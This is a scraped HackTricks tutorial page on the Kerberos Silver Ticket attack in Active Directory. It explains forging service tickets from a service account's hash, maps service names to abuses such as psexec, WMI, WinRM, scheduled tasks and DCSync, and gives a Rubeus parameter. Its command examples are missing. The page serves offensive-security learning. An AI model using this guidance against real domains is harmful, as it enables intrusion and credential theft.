Silver Ticket
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!
The Silver Ticket attack involves the exploitation of service tickets in Active Directory (AD) environments. This method relies on acquiring the NTLM hash of a service account, such as a computer account, to forge a Ticket Granting Service (TGS) ticket. With this forged ticket, an attacker can access specific services on the network, impersonating any user, typically aiming for administrative privileges. It's emphasized that using AES keys for forging tickets is more secure and less detectable.
For ticket crafting, different tools are employed based on the operating system:
The CIFS service is highlighted as a common target for accessing the victim's file system, but other services like HOST and RPCSS can also be exploited for tasks and WMI queries.
WMI
HOST
RPCSS
PowerShell Remoting
HOST
HTTP
Depending on OS also:
WSMAN
RPCSS
WinRM
HOST
HTTP
In some occasions you can just ask for: WINRM
Scheduled Tasks
HOST
Windows File Share, also psexec
CIFS
LDAP operations, included DCSync
LDAP
Windows Remote Server Administration Tools
RPCSS
LDAP
CIFS
Golden Tickets
krbtgt
Using Rubeus you may ask for all these tickets using the parameter:
/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm
4624: Account Logon
4634: Account Logoff
4672: Admin Logon
In the following examples lets imagine that the ticket is retrieved impersonating the administrator account.
With this ticket you will be able to access the C$
and ADMIN$
folder via SMB (if they are exposed) and copy files to a part of the remote filesystem just doing something like:
You will also be able to obtain a shell inside the host or execute arbitrary commands using psexec:
PsExec/Winexec/ScExecWith this permission you can generate scheduled tasks in remote computers and execute arbitrary commands:
With these tickets you can execute WMI in the victim system:
Find more information about wmiexec in the following page:
WmiExecWith winrm access over a computer you can access it and even get a PowerShell:
Check the following page to learn more ways to connect with a remote host using winrm:
WinRMNote that winrm must be active and listening on the remote computer to access it.
With this privilege you can dump the DC database using DCSync:
Learn more about DCSync in the following page:
Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)